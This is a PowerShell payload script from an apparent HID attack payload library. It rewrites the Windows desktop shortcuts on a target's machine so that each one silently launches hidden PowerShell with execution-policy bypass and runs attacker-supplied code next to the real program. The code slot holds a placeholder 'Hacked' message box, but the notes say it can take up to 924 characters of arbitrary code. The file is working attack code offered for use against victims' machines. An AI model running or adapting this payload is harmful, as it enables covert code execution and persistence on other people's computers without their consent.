Path: blob/master/payloads/library/execution/-RD-ShortcutJacker/Shortcut-Jacker.ps1
3018 views
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Shortcut-Jacker | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This is payload used to inject powershell code into shortcuts
.DESCRIPTION
This payload will gather information on the shortcuts on your targets desktop
That data will then be manipulated to embed a powershell script
This script will be ran in the background when the short cut is
#>
############################################################################################################################################################
<#
.NOTES
The powershell code stored in this variable is what will run in the background
This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code
variable and it will still run.
#>
$code = "Add-Type -AssemblyName PresentationCore,PresentationFramework; [System.Windows.MessageBox]::Show('Hacked')"
############################################################################################################################################################
function Get-Shortcut {
param(
$path = $null
)
$obj = New-Object -ComObject WScript.Shell
if ($path -eq $null) {
$pathUser = [System.Environment]::GetFolderPath('StartMenu')
$pathCommon = $obj.SpecialFolders.Item('AllUsersStartMenu')
$path = dir $pathUser, $pathCommon -Filter *.lnk -Recurse
}
if ($path -is [string]) {
$path = dir $path -Filter *.lnk
}
$path | ForEach-Object {
if ($_ -is [string]) {
$_ = dir $_ -Filter *.lnk
}
if ($_) {
$link = $obj.CreateShortcut($_.FullName)
$info = @{}
$info.Hotkey = $link.Hotkey
$info.TargetPath = $link.TargetPath
$info.LinkPath = $link.FullName
$info.Arguments = $link.Arguments
$info.Target = try {Split-Path $info.TargetPath -Leaf } catch { 'n/a'}
$info.Link = try { Split-Path $info.LinkPath -Leaf } catch { 'n/a'}
$info.WindowStyle = $link.WindowStyle
$info.IconLocation = $link.IconLocation
return $info
}
}
}
#-----------------------------------------------------------------------------------------------------------
function Set-Shortcut {
param(
[Parameter(ValueFromPipelineByPropertyName=$true)]
$LinkPath,
$IconLocation,
$Arguments,
$TargetPath
)
begin {
$shell = New-Object -ComObject WScript.Shell
}
process {
$link = $shell.CreateShortcut($LinkPath)
$PSCmdlet.MyInvocation.BoundParameters.GetEnumerator() |
Where-Object { $_.key -ne 'LinkPath' } |
ForEach-Object { $link.$($_.key) = $_.value }
$link.Save()
}
}
#-----------------------------------------------------------------------------------------------------------
function hijack{
$Link = $i.LinkPath
$Loc = $i.IconLocation
$TargetPath = $i.TargetPath
if($Loc.length -lt 4){$Loc = "$TargetPath$Loc"}
$Target = $i.Target
if(Test-Path -Path "$Link" -PathType Leaf){Set-Shortcut -LinkPath "$Link" -IconLocation "$Loc" -Arguments "-w h -NoP -NonI -Exec Bypass start-process '$TargetPath';$code" -TargetPath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"}
}
#-----------------------------------------------------------------------------------------------------------
Get-ChildItem –Path "$Env:USERPROFILE\Desktop" -Filter *.lnk |Foreach-Object {$i = Get-Shortcut $_.FullName;hijack $_.FullName}